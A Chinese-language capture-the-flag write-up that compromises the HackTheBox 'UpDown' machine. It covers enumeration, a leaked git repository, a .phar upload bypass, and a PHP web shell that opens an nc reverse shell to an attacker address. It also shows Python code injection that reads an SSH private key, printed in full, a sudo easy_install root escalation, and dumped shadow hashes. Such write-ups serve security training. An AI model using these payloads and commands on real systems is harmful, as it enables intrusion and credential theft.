基本信息
端口扫描 22和80:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ nmap -sC -sV -Pn 10.10.11.177 Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-13 20:19 CST Nmap scan report for 10.10.11.177 Host is up (0.33s latency). Not shown: 996 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e1f98d7c8ba61dbf149669d701702e7 (RSA) | 256 c21cfe1152e3d7e5f759186b68453f62 (ECDSA) |_ 256 5f6e12670a66e8e2b761bec4143ad38e (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Is my Website up ? |_http-server-header: Apache/2.4.41 (Ubuntu) 2043/tcp filtered isis-bcast 8100/tcp filtered xprint-server Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 108.98 seconds
80 在线检查其他网站状态:
子域名 得到的域名加hosts,继续探测子域名:
1 10.10.11.177 siteisup.htb
发现dev子域名:
1 2 3 gobuster vhost -u http://siteisup.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Found: dev.siteisup.htb (Status: 403) [Size: 281]
直接访问是403:
目录扫描 目录扫描也发现有个dev:
1 2 3 gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://siteisup.htb /dev (Status: 301) [Size: 310] [--> http://siteisup.htb/dev/]
dev 直接访问是空白页面,继续扫描发现git泄漏:
1 2 3 4 gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://siteisup.htb/dev/ /.git/HEAD (Status: 200) [Size: 21] /index.php (Status: 200) [Size: 0]
git泄漏 dump下载,查看log发现一些信息:
1 git-dumper http://siteisup.htb/dev/.git/ git_dump
dev那边直接访问是403,这个提示我们需要特殊的header
查看diff,得到信息:
1 2 3 4 5 6 7 8 9 10 git diff 8812785e31c879261050e72e20f298ae8c43b565 bc4ba79e596e9fd98f1b2837b9bd3548d04fe7ab diff --git a/.htaccess b/.htaccess index b317ab5..44ff240 100644 --- a/.htaccess +++ b/.htaccess @@ -2,4 +2,3 @@ SetEnvIfNoCase Special-Dev "only4dev" Required-Header Order Deny,Allow Deny from All Allow from env=Required-Header
根据信息,添加header,测试访问dev成功:
1 curl http://dev.siteisup.htb -H "Special-Dev: only4dev"
dev.siteisup.htb burp里加条规则自动加header,后续方便操作:
文件上传 有个上传点,相关代码也都在之前的gitdump里可以得到, 代码里可以看到各种检查,是一个上传文件批量检查文件内容中站点状态的功能
这里可以利用phar文件,让我们创建一个包含大量站点的 .phar 文件,以便我们有足够的时间浏览我们上传的文件。我们在 RCE 文件的末尾包含了一些 php 代码。然后,我们上传文件。最后,当 checker.php 忙于检查站点时,我们浏览到上传的文件以执行代码。
上传文件,然后浏览到http://dev.siteisup.htb/uploads/,可以看到临时文件夹md5,然后浏览到那个文件夹,点击上传的文件,得到php代码执行结果
webshell 存在大量disable_function,但没有禁用proc_open:
phpinfo.phar 1 2 3 4 5 6 7 8 9 10 http://dev.siteisup.htb http://dev.siteisup.htb http://dev.siteisup.htb http://dev.siteisup.htb ... http://dev.siteisup.htb # 100行 <?php phpinfo(); ?>
shell.phar 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 # 大量hosts <?php $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to ); $process = proc_open("sh", $descriptorspec, $pipes); if (is_resource($process)) { // $pipes now looks like this: // 0 => writeable handle connected to child stdin // 1 => readable handle connected to child stdout // Any error output will be appended to /tmp/error-output.txt fwrite($pipes[0], "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.8 4444 >/tmp/f"); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); // It is important that you close any pipes before calling // proc_close in order to avoid a deadlock $return_value = proc_close($process); echo "command returned $return_value\n"; } ?>
checker.php 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 <?php if(DIRECTACCESS){ die("Access Denied"); } ?> <!DOCTYPE html> <html> <head> <meta charset='utf-8' /> <meta http-equiv="X-UA-Compatible" content="chrome=1" /> <link rel="stylesheet" type="text/css" media="screen" href="stylesheet.css"> <title>Is my Website up ? (beta version)</title> </head> <body> <div id="header_wrap" class="outer"> <header class="inner"> <h1 id="project_title">Welcome,<br> Is My Website UP ?</h1> <h2 id="project_tagline">In this version you are able to scan a list of websites !</h2> </header> </div> <div id="main_content_wrap" class="outer"> <section id="main_content" class="inner"> <form method="post" enctype="multipart/form-data"> <label>List of websites to check:</label><br><br> <input type="file" name="file" size="50"> <input name="check" type="submit" value="Check"> </form> <?php function isitup($url){ $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, trim($url)); curl_setopt($ch, CURLOPT_USERAGENT, "siteisup.htb beta"); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $f = curl_exec($ch); $header = curl_getinfo($ch); if($f AND $header['http_code'] == 200){ return array(true,$f); }else{ return false; } curl_close($ch); } if($_POST['check']){ # File size must be less than 10kb. if ($_FILES['file']['size'] > 10000) { die("File too large!"); } $file = $_FILES['file']['name']; # Check if extension is allowed. $ext = getExtension($file); if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){ die("Extension not allowed!"); } # Create directory to upload our file. $dir = "uploads/".md5(time())."/"; if(!is_dir($dir)){ mkdir($dir, 0770, true); } # Upload the file. $final_path = $dir.$file; move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}"); # Read the uploaded file. $websites = explode("\n",file_get_contents($final_path)); foreach($websites as $site){ $site=trim($site); if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){ $check=isitup($site); if($check){ echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>"; }else{ echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>"; } }else{ echo "<center><font color='red'>Hacking attempt was detected !</font></center>"; } } # Delete the uploaded file. @unlink($final_path); } function getExtension($file) { $extension = strrpos($file,"."); return ($extension===false) ? "" : substr($file,$extension+1); } ?> </section> </div> <div id="footer_wrap" class="outer"> <footer class="inner"> <p class="copyright">siteisup.htb (beta)</p><br> <a class="changelog" href="changelog.txt">changelog.txt</a><br> </footer> </div> </body> </html>
developer developer用户目录发现一个带suid的文件:
查看对应的python文件,发现url是通过input接收后未经过任何过滤,可以通过 __import__ 这种方式执行python代码
代码注入 测试成功,直接读私钥:
1 2 __import__('os' ).system('id' ) __import__('os' ).system('cat /home/developer/.ssh/id_rsa' )
developer_id_rsa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
siteisup_test.py 1 2 3 4 5 6 7 8 9 10 www-data@updown:/home/developer/dev$ cat siteisup_test.py cat siteisup_test.py import requestsurl = input("Enter URL here:" ) page = requests.get(url) if page.status_code == 200 : print "Website is up" else : print "Website is down"
user flag 得到的私钥ssh登录:
提权信息 这部分很简单,基础的gtfobins:
提权 & root flag 1 2 3 TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py sudo /usr/local/bin/easy_install $TF
shadow 1 2 root:$6$35UwqDmGM31K3z1O$EV0yHaLbvEqQ1YfxHOl4fMFHnR0O0Lo7RSnFGpYdfUwBmec0/5JWenL6GLivYgeka8Z4XyYW2UhWOV5UOdK0w.:19165:0:99999:7::: developer:$6$LkPh3nNMEVO.zmIc$I/j67KSo1n7pR.fzcMfH/hc/8EYISX8JUtDpoc7iMIiYEhX4bgVXPV4L6Gam3AvxMd46wh5XTulsxbpy9ezLf/:19165:0:99999:7:::
参考资料
Last updated: 2023-08-11 13:33:45
